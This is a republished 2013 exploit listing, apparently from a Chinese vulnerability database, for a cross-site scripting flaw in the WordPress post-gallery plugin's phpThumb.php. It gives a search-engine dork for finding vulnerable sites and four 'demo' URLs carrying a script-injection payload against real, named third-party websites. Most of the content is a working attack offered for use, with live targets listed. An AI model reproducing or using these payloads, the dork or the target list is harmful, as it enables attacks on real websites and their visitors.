WordPress Post-Gallery Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044547 漏洞类型
发布时间 2013-08-27 更新时间 2013-08-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080205
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
The Wordpress post-gallery Plugin suffers from a Cross-Site Scripting vulnerability.

#################################

#          Iranian Exploit DataBase Forum

#               http://iedb.ir/acc

#                 http://iedb.ir

#################################

# Exploit Title : Wordpress post-gallery Plugin Xss vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : IeDb.Team@Gmail.com

# Home : http://iedb.ir   -   http://iedb.ir/acc

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/post-gallery/thirdparty/phpthumb/

#################################

# Exploit :

# http://site.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=[Xss]

# Dem0 :

http://www.knappenforeningen.no/wp/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
http://monsterbike.eu/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
http://www.yerevanmagazine.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
http://www.bambusudsalg.dk/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>

#################################

# Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - F&#945;&#1103;iD - Medrik - Achraf - Dj.TiniVini

# B3hz4d - C0dex - Beni_Vanda  & All Member In Iedb.ir/acc & Iranian Hackers

#################################

# Exploit Archive = http://www.iedb.ir/exploits-411.html

#################################